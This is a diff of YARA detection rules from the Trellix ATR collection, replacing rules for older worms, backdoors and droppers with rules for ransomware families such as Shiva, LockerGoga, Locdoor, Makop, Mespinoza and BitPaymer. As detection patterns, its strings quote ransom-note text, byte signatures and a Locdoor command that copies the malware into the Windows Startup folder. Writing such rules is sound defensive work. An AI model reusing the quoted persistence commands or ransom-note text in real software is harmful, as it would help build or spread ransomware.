 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "Cambrel.exe" fullword ascii
-		$s2 = { 22 00 54 00 65 00 78 00 74 00 49 00 6e 00 70 00 75 00 74 00 46 00 72 00 61 00 6d 00 65 00 77 00 6f 00 72 00 6b 00 2e 00 44 00 59 00 4e 00 4c 00 49 00 4e 00 4b 00 22 00 }
-		$op0 = { 06 7c 34 00 00 04 7b 17 00 00 04 7e 21 00 00 0a }
-		$op1 = { 96 00 92 0e 83 02 02 00 f4 20 }
-		$op2 = { 03 00 c6 01 d9 08 1b 03 44 }
-		$p0 = { 80 00 96 20 83 11 b7 02 10 }
-		$p1 = { 20 01 00 72 0f 00 20 02 00 8a 0f 00 20 03 00 61 }
-		$p2 = { 03 00 c6 01 cd 06 13 03 79 }
+		$s1 = {2D 2D 2D 52 41 47 4E 41 52 20 53 45 43 52 45 54 2D 2D 2D}
+		$s2 = { 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? B8 ?? ?? ?? ?? 0F 44 }
+		$s3 = { 5? 8B ?? 5? 5? 8B ?? ?? 8B ?? 85 ?? 0F 84 }
+		$s4 = { FF 1? ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 }
+		$s5 = { 8D ?? ?? ?? ?? ?? 5? FF 7? ?? E8 ?? ?? ?? ?? 85 ?? 0F 85 }
+		$op1 = { 0f 11 85 70 ff ff ff 8b b5 74 ff ff ff 0f 10 41 }
+		$p0 = { 72 eb fe ff 55 8b ec 81 ec 00 01 00 00 53 56 57 }
+		$p1 = { 60 be 00 00 41 00 8d be 00 10 ff ff 57 eb 0b 90 }
+		$bp0 = { e8 b7 d2 ff ff ff b6 84 }
+		$bp1 = { c7 85 7c ff ff ff 24 d2 00 00 8b 8d 7c ff ff ff }
+		$bp2 = { 8d 85 7c ff ff ff 89 85 64 ff ff ff 8d 4d 84 89 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of ( $s* ) and all of ( $op* ) or all of ( $p* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 4 of ( $s* ) and $op1 ) or all of ( $p* ) and pe.imphash ( ) == "9f611945f0fe0109fe728f39aad47024" or all of ( $bp* ) and pe.imphash ( ) == "489a2424d7a14a26bfcfb006de3cd226"
 }
-rule TRELLIX_ARC_Malw_Inabot_Worm : WORM FILE
+rule TRELLIX_ARC_Unpacked_Shiva_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect inabot worm based on PDB"
+		description = "Rule to detect an unpacked sample of Shiva ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "b899d2d6-000a-5363-9efe-527dcd0cea17"
-		date = "2013-04-19"
+		id = "c6cd4421-216f-5c1f-bb8d-fc8ab00bb72d"
+		date = "2018-09-05"
 		modified = "2020-08-14"
-		reference = "http://verwijderspyware.blogspot.com/2013/04/elimineren-w32inabot-worm-hoe-te.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_inabot_worm_pdb.yar#L1-L25"
+		reference = "https://twitter.com/malwrhunterteam/status/1037424962569732096"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Shiva.yar#L1-L37"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "c9c010228254aae222e31c669dda639cdd30695729b8ef2b6ece06d899a496aa"
-		logic_hash = "70485de4e071b684faa87484ce2a53a8b2a29d0a2954e785b858c7ff1d908de0"
+		hash = "299bebcb18e218254960ef96c2e65a4dc1945dcdfe9fc68550022f99a474f56d"
+		logic_hash = "8a6a1d9f3b75617d8f07489ecf2867f90ddcf9fbe1db1e7c0f5c26833f88be3f"
 		score = 75
-		quality = 70
-		tags = "WORM, FILE"
+		quality = 66
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "worm"
-		malware_family = "Worm:W32/Inabot"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Shiva"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\trasser\\portland.pdb"
-		$pdb1 = "\\mainstream\\archive.pdb"
+		$s1 = "c:\\Users\\sys\\Desktop\\v 0.5\\Shiva\\Shiva\\obj\\Debug\\shiva.pdb" fullword ascii
+		$s2 = "This email will be as confirmation you are ready to pay for decryption key." fullword wide
+		$s3 = "Your important files are now encrypted due to a security problem with your PC!" fullword wide
+		$s4 = "write.php?info=" fullword wide
+		$s5 = " * Do not try to decrypt your data using third party software, it may cause permanent data loss." fullword wide
+		$s6 = " * Do not rename encrypted files." fullword wide
+		$s7 = ".compositiontemplate" fullword wide
+		$s8 = "You have to pay for decryption in Bitcoins. The price depends on how fast you write to us." fullword wide
+		$s9 = "\\READ_IT.txt" fullword wide
+		$s10 = ".lastlogin" fullword wide
+		$s11 = ".logonxp" fullword wide
+		$s12 = " * Decryption of your files with the help of third parties may cause increased price" fullword wide
+		$s13 = "After payment we will send you the decryption tool that will decrypt all your files." fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 180KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB ) and all of them
 }
-rule TRELLIX_ARC_MALW_Cobaltrike : BACKDOOR FILE
+rule TRELLIX_ARC_Backdoorfckg : CTB_LOCKER_RANSOMWARE RANSOMWARE
 {
 	meta:
-		description = "Rule to detect CobaltStrike beacon"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a7dae4c7-672e-58fb-8542-90fa90d991a4"
-		date = "2020-07-19"
-		modified = "2021-08-30"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_cobaltstrike.yar#L1-L38"
+		description = "CTB_Locker"
+		author = "ISG"
+		id = "2a00551d-1f80-5991-9416-d9b1b39db8e9"
+		date = "2015-01-20"
+		modified = "2020-08-14"
+		reference = "https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_CTBLocker.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "fc91d40c6544c7ab7c60b3cb8fc542bd4a6fac79dbe00cad8f612854f2a6dcd1"
+		logic_hash = "a334b07053db66aa0fb2d2b2ca7f94c480509041724ddd4dd1708052d75baffb"
 		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
+		quality = 20
+		tags = "CTB_LOCKER_RANSOMWARE, RANSOMWARE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/CobaltStrike"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/CTBLocker"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash1 = "f47a627880bfa4a117fec8be74ab206690e5eb0e9050331292e032cd22883f5b"
 
 	strings:
-		$pattern_0 = { e9???????? eb0a b801000000 e9???????? }
-		$pattern_1 = { 3bc7 750d ff15???????? 3d33270000 }
-		$pattern_2 = { 8bd0 e8???????? 85c0 7e0e }
-		$pattern_3 = { 50 8d8d24efffff 51 e8???????? }
-		$pattern_4 = { 03b5d4eeffff 89b5c8eeffff 3bf7 72bd 3bf7 }
-		$pattern_5 = { 8b450c 8945f4 8d45f4 50 }
-		$pattern_6 = { 33c5 8945fc 8b4508 53 56 ff750c 33db }
-		$pattern_7 = { e8???????? e9???????? 833d????????01 7505 e8???????? }
-		$pattern_8 = { 53 53 8d85f4faffff 50 }
-		$pattern_9 = { 68???????? 53 50 e8???????? 83c424 }
-		$pattern_10 = { 488b4c2420 8b0401 8b4c2408 33c8 8bc1 89442408 }
-		$pattern_11 = { 488d4d97 e8???????? 4c8d9c24d0000000 418bc7 498b5b20 498b7328 498b7b30 }
-		$pattern_12 = { bd08000000 85d2 7459 ffcf 4d85ed }
-		$pattern_13 = { 4183c9ff 33d2 ff15???????? 4c63c0 4983f8ff }
-		$pattern_14 = { 49c1e002 e8???????? 03f3 4d8d349e 3bf5 7d13 }
-		$pattern_15 = { 752c 4c8d45af 488d55af 488d4d27 }
+		$string0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+		$stringl = "RNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+		$string2 = "keme132.DLL"
+		$string3 = "klospad.pdb"
 
 	condition:
-		7 of them and filesize < 696320
+		3 of them
 }
-rule TRELLIX_ARC_Dridex_P2P_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_Lockergogaransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Dridex P2P based on the PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "57350c96-877e-57de-9465-df9f7eb6d656"
-		date = "2014-11-29"
+		description = "LockerGoga Ransomware"
+		author = "Christiaan Beek - McAfee ATR team"
+		id = "bdf5da34-adf0-5731-820f-96511e647a83"
+		date = "2019-03-20"
 		modified = "2020-08-14"
-		reference = "https://www.us-cert.gov/ncas/alerts/aa19-339a"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_dridex_p2p_pdb.yar#L1-L25"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_LockerGoga.yar#L1-L36"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5345a9405212f3b8ef565d5d793e407ae8db964865a85c97e096295ba3f39a78"
-		logic_hash = "c9c4db48435203cdb882eef8082efd8424bd13f1aa512cfb3082f365b9bc6e83"
+		hash = "ba15c27f26265f4b063b65654e9d7c248d0d651919fafb68cb4765d1e057f93f"
+		logic_hash = "165fa0fa044b2e0d2344626c2064162f23e13dc17310a772b703dbbe9457bd99"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Dridex"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/LockerGoga"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\c0da\\j.pdb"
+		$1 = "boost::interprocess::spin_recursive_mutex recursive lock overflow" fullword ascii
+		$2 = ".?AU?$error_info_injector@Usync_queue_is_closed@concurrent@boost@@@exception_detail@boost@@" fullword ascii
+		$3 = ".?AV?$CipherModeFinalTemplate_CipherHolder@V?$BlockCipherFinal@$00VDec@RC6@CryptoPP@@@CryptoPP@@VCBC_Decryption@2@@CryptoPP@@" fullword ascii
+		$4 = "?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v" fullword ascii
+		$5 = "cipher.exe" fullword ascii
+		$6 = ".?AU?$placement_destroy@Utrace_queue@@@ipcdetail@interprocess@boost@@" fullword ascii
+		$7 = "3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%" fullword ascii
+		$8 = "CreateProcess failed" fullword ascii
+		$9 = "boost::dll::shared_library::load() failed" fullword ascii
+		$op1 = { 8b df 83 cb 0f 81 fb ff ff ff 7f 76 07 bb ff ff }
+		$op2 = { 8b df 83 cb 0f 81 fb ff ff ff 7f 76 07 bb ff ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 6 of them ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Malw_Mangzamel_Trojan : TROJAN FILE
+rule TRELLIX_ARC_Locdoor_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Mangzamel  trojan based on PDB"
+		description = "Rule to detect Locdoor/DryCry"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "ca77180f-6133-5edb-a36b-78bc6f18d80c"
-		date = "2014-06-25"
+		id = "d855d7fd-a1e3-561e-906e-103752285b0f"
+		date = "2018-09-02"
 		modified = "2020-08-14"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_mangzamel_trojan_pdb.yar#L1-L26"
+		reference = "https://twitter.com/leotpsc/status/1036180615744376832"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_locdoor.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "4324580ea162a636b7db1efb3a3ba38ce772b7168b4eb3a149df880a47bd72b7"
-		logic_hash = "bab103c671445e0ea916fae290689d30d45021bdca58a495ebd3d6ca9ca55051"
+		hash = "0000c55f7cdbbad9bacba0e79637696f3bfeb95a5f71dfa0b398bc77a207eb41"
+		logic_hash = "c9519279a929feedae2bab58cd0de91f6c447827fa59afa927726fde84d21e1c"
 		score = 75
 		quality = 70
-		tags = "TROJAN, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/Mangzamel"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Locdoor"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\svn\\sys\\binary\\i386\\agony.pdb"
-		$pdb1 = "\\Windows\\i386\\ndisdrv.pdb"
+		$s1 = "copy \"Locdoor.exe\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\temp00000000.exe\"" fullword ascii
+		$s2 = "copy wscript.vbs C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\wscript.vbs" fullword ascii
+		$s3 = "!! Your computer's important files have been encrypted! Your computer's important files have been encrypted!" fullword ascii
+		$s4 = "echo CreateObject(\"SAPI.SpVoice\").Speak \"Your computer's important files have been encrypted! " fullword ascii
+		$s5 = "! Your computer's important files have been encrypted! " fullword ascii
+		$s7 = "This program is not supported on your operating system." fullword ascii
+		$s8 = "echo Your computer's files have been encrypted to Locdoor Ransomware! To make a recovery go to localbitcoins.com and create a wa" ascii
+		$s9 = "Please enter the password." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 360KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB ) and all of them
 }
-rule TRELLIX_ARC_Havex_Backdoor_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_RANSOM_Makop : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect backdoor Havex based on PDB"
+		description = "Rule to detect the unpacked Makop ransomware samples"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "a667bb4e-8c38-59a6-8ae0-09c44961a687"
-		date = "2012-11-17"
+		id = "2828f2f9-4702-5cef-8b4e-7e98146c0332"
+		date = "2020-07-19"
 		modified = "2020-08-14"
-		reference = "https://www.f-secure.com/v-descs/backdoor_w32_havex.shtml"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_backdoor_havex_pdb.yar#L1-L26"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_makop.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "0f4046be5de15727e8ac786e54ad7230807d26ef86c3e8c0e997ea76ab3de255"
-		logic_hash = "dc50475b1ff2194306a0295f71860e4cc5ae7e126daa5d401b98cd2a0aadf1dd"
+		hash = "008e4c327875110b96deef1dd8ef65cefa201fef60ca1cbb9ab51b5304e66fe1"
+		logic_hash = "2b4f8b90d46530421b66dbb04df6e84d268709fbee884536d8acc91e1b85f8a4"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Havex"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Makop"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\Workspace\\PhalangX 3D\\Src\\Build\\Release\\Phalanx-3d.ServerAgent.pdb"
-		$pdb1 = "\\Workspace\\PhalangX 3D\\Src\\Build\\Release\\Tmprovider.pdb"
+		$pattern_0 = { 50 8d7c2420 e8???????? 84c0 0f84a6020000 8b742460 ba???????? }
+		$pattern_1 = { 51 52 53 ffd5 85c0 746d 8b4c240c }
+		$pattern_2 = { 7521 68000000f0 6a18 6a00 6a00 56 ff15???????? }
+		$pattern_3 = { 83c40c 8d4e0c 51 66c7060802 66c746041066 c6460820 }
+		$pattern_4 = { 51 ffd3 50 ffd7 8b4628 85c0 }
+		$pattern_5 = { 85c9 741e 8b4508 8b4d0c 8a11 }
+		$pattern_6 = { 83c002 6685c9 75f5 2bc6 d1f8 66390c46 8d3446 }
+		$pattern_7 = { 895a2c 8b7f04 85ff 0f85f7feffff 55 6a00 }
+		$pattern_8 = { 8b3d???????? 6a01 6a00 ffd7 50 ff15???????? }
+		$pattern_9 = { 85c0 7407 50 ff15???????? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
+		7 of them and filesize < 237568
 }
-rule TRELLIX_ARC_Rietspoof_Loader : RANSOMWARE FILE
+rule TRELLIX_ARC_Snake_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the Rietspoof loader"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "f306e381-e2ae-528e-937b-aced72356d77"
-		date = "2025-06-01"
-		modified = "2020-08-14"
-		reference = "https://blog.avast.com/rietspoof-malware-increases-activity"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_rietspoof_loader.yar#L1-L22"
+		description = "Rule to detect Snake ransomware"
+		author = "McAfee ATR Team"
+		id = "b8f50af5-5568-5676-93a1-e818f08df0ce"
+		date = "2020-02-20"
+		modified = "2020-10-12"
+		reference = "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_snake_ransomware.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "d72b58ff452070e03d0b25bc433ef5c677df77dd440adc1ecdb592cee24235fb"
+		hash = "e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60"
+		logic_hash = "3ae64fbacbf886b8d09abc3f5f8eb9c8bff809909a251f2d055056e6d12217a2"
 		score = 75
 		quality = 70
 		tags = "RANSOMWARE, FILE"
+		rule_version = "v1"
 		malware_type = "ransomware"
-		malware_family = "Loader:W32/Rietspoof"
+		malware_family = "Ransom:W32/EKANS"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$x1 = "\\Work\\d2Od7s43\\techloader\\loader" fullword ascii
+		$snake = { 43 3A 2F 55 73 ?? 72 ?? 2F 57 49 4E 31 2F 67 6F 2F 73 ?? 63 2F 6A 6F 62 6E 68 62 67 6E 6E 69 66 70 6F 64 68 68 70 ?? 6D 66 2F 6E 66 64 6C 68 6F 70 68 6B 65 69 6A 61 64 67 66 64 64 69 6D 2F 6E 66 64 6C 68 6F 70 68 6B 65 69 6A 61 64 67 66 64 64 69 6D 2F 76 74 5F 73 74 ?? 69 6E 67 2E 67 6F 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 11000KB ) and all of them
 }
-rule TRELLIX_ARC_Dropper_Demekaf_Pdb : DROPPER FILE
+
+rule TRELLIX_ARC_Ransom_Mespinoza : FILE
 {
 	meta:
-		description = "Rule to detect Demekaf dropper based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "b49f42c1-d737-5afa-b547-7268e4cde360"
-		date = "2011-03-26"
-		modified = "2020-08-14"
-		reference = "https://v.virscan.org/Trojan-Dropper.Win32.Demekaf.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_dropper_demekaf_pdb.yar#L1-L25"
+		description = "rule to detect Mespinoza ransomware"
+		author = "Christiaan Beek @ McAfee ATR"
+		id = "70a76bc4-e0cb-5caa-bb64-1a732349d2ce"
+		date = "2020-11-24"
+		modified = "2020-11-24"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Mespinoza.yar#L3-L27"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "fab320fceb38ba2c5398debdc828a413a41672ce9745afc0d348a0e96c5de56e"
-		logic_hash = "89c0c1da1f8997b12a446c93bbde200e62fac9cab2a9a17147b268d435bdc3b6"
+		logic_hash = "e245fb9a71d86209690a6f4c7aa38c10dbd32cda2ea3ecde08d0d94e896381cb"
 		score = 75
 		quality = 70
-		tags = "DROPPER, FILE"
-		rule_version = "v1"
-		malware_type = "dropper"
-		malware_family = "Dropper:W32/Demekaf"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		tags = "FILE"
+		malware_family = "ransom_Win_Mespinoza"
+		hash1 = "e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead"
+		hash2 = "48355bd2a57d92e017bdada911a4b31aa7225c0b12231c9cbda6717616abaea3"
+		hash3 = "e4287e9708a73ce6a9b7a3e7c72462b01f7cc3c595d972cf2984185ac1a3a4a8"
 
 	strings:
-		$pdb = "\\vc\\res\\fake1.19-jpg\\fake\\Release\\fake.pdb"
+		$s1 = "update.bat" fullword ascii
+		$s2 = "protonmail.com" fullword ascii
+		$s3 = "Every byte on any types of your devices was encrypted." fullword ascii
+		$s4 = "To get all your data back contact us:" fullword ascii
+		$s5 = "What to do to get all data back?" fullword ascii
+		$s6 = "Don't try to use backups because it were encrypted too." fullword ascii
+		$op0 = { 83 f8 4b 75 9e 0f be 46 ff 8d 4d e0 ff 34 85 50 }
+		$op1 = { c6 05 34 9b 47 00 00 e8 1f 0c 03 00 59 c3 cc cc }
+		$op2 = { e8 ef c5 fe ff b8 ff ff ff 7f eb 76 8b 4d 0c 85 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and pe.imphash ( ) == "b5e8bd2552848bb7bf2f28228d014742" and ( 8 of them ) and 2 of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Malw_Eicar : EICAR
+rule TRELLIX_ARC_Bitpaymer_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the EICAR pattern"
+		description = "Rule to detect BitPaymer Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "16307b03-7fab-5d68-ad3b-0efcea952fcf"
-		date = "2025-06-01"
+		id = "20b91cf2-2a84-55d9-8230-90d7b20a461f"
+		date = "2019-11-08"
 		modified = "2020-08-14"
-		reference = "https://www.eicar.org/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_Eicar.yar#L1-L22"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/spanish-mssp-targeted-by-bitpaymer-ransomware/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Bitpaymer.yar#L1-L72"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
-		logic_hash = "564b0592f40582fe71e2dab0c0f25c168462f9297c13e7c9f06ac51b492e4533"
+		logic_hash = "527cdbdf51e6f3f5d58e805cf4a1bc09c9d24880c2323046acef6ee03c92d62f"
 		score = 75
-		quality = 70
-		tags = "EICAR"
-		malware_type = "eicar"
-		malware_family = "W32/Eicar"
-		actor_type = "Unknown"
+		quality = 66
+		tags = "RANSOMWARE, FILE"
+		rule_version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/BitPaymer"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
+		$s1 = "IEncrypt.dll" fullword wide
+		$op0 = { e8 5f f3 ff ff ff b6 e0 }
+		$op1 = { e8 ad e3 ff ff 59 59 8b 75 08 8d 34 f5 38 eb 42 }
+		$op2 = { e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 c1 d1 ff }
+		$pdb = "S:\\Work\\_bin\\Release-Win32\\wp_encrypt.pdb" fullword ascii
+		$oj0 = { 39 74 24 34 75 53 8d 4c 24 18 e8 b8 d1 ff ff ba }
+		$oj1 = { 5f 8b c6 5e c2 08 00 56 8b f1 8d 4e 34 e8 91 af }
+		$oj2 = { 8b cb 8d bd 50 ff ff ff 8b c1 89 5f 04 99 83 c1 }
+		$t1 = ".C:\\aaa_TouchMeNot_.txt" fullword wide
+		$ok0 = { e8 b5 34 00 00 ff 74 24 18 8d 4c 24 54 e8 80 39 }
+		$ok1 = { 8b 5d 04 33 ff 8b 44 24 34 89 44 24 5c 85 db 7e }
+		$ok2 = { 55 55 ff 74 24 20 8d 4c 24 34 e8 31 bf 00 00 55 }
+		$random = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+" fullword ascii
+		$oi0 = { a1 04 30 ac 00 8b ce 0f af c2 03 c0 99 8b e8 89 }
+		$oi1 = { e8 64 a2 ff ff 85 c0 74 0c 8d 4d d8 51 ff 35 64 }
+		$oi2 = { c7 03 d4 21 ac 00 e8 86 53 00 00 89 73 10 89 7b }
+		$ou0 = { e8 64 a2 ff ff 85 c0 74 0c 8d 4d d8 51 ff 35 60 }
+		$ou1 = { a1 04 30 04 00 8b ce 0f af c2 03 c0 99 8b e8 89 }
+		$ou2 = { 8d 4c 24 10 e8 a0 da ff ff 68 d0 21 04 00 8d 4c }
+		$oa1 = { 56 52 ba 00 10 0c 00 8b f1 e8 28 63 00 00 8b c6 }
+		$oa2 = { 81 3d 50 30 0c 00 53 c6 d2 43 56 8b f1 75 23 ba }
+		$oy0 = { c7 06 cc 21 a6 00 c7 46 08 }
+		$oy1 = { c7 06 cc 21 a6 00 c7 46 08 }
+		$oy2 = { c7 06 cc 21 a6 00 c7 46 08 }
+		$oh1 = { e8 74 37 00 00 a3 00 30 fe 00 8d 4c 24 1c 8d 84 }
+		$oh2 = { 56 52 ba 00 10 fe 00 8b f1 e8 28 63 00 00 8b c6 }
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB ) and ( $s1 and all of ( $op* ) ) or ( $pdb and all of ( $oj* ) ) or ( $t1 and all of ( $ok* ) ) or ( $random and all of ( $oi* ) ) or ( $random and all of ( $ou* ) ) or ( $random and all of ( $oa* ) and $ou0 ) or ( $random and all of ( $oy* ) ) or ( $random and all of ( $oh* ) ) or ( $random and $ou0 ) or ( $random and $oi1 )
 }
-rule TRELLIX_ARC_Downloader_Darkmegi_Pdb : DOWNLOADER FILE
+rule TRELLIX_ARC_RANSOM_Babuk_Packed_Feb2021 : RANSOM T1027_005 T1027 T1083 T1082 T1059 T1129 FILE
 {
 	meta:
-		description = "Rule to detect DarkMegi downloader based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "3ccc3685-e05b-5620-9198-24733fb1e7eb"
-		date = "2013-03-06"
-		modified = "2020-08-14"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_downloader_darkmegi.yar#L1-L25"
+		description = "Rule to detect Babuk Locker packed"
+		author = "McAfee ATR"
+		id = "f5f3a3a6-2531-56c4-9153-b698c7bdc3d3"
+		date = "2021-02-19"
+		modified = "2021-02-24"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Babuk_Packed_Feb2021.yar#L1-L30"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
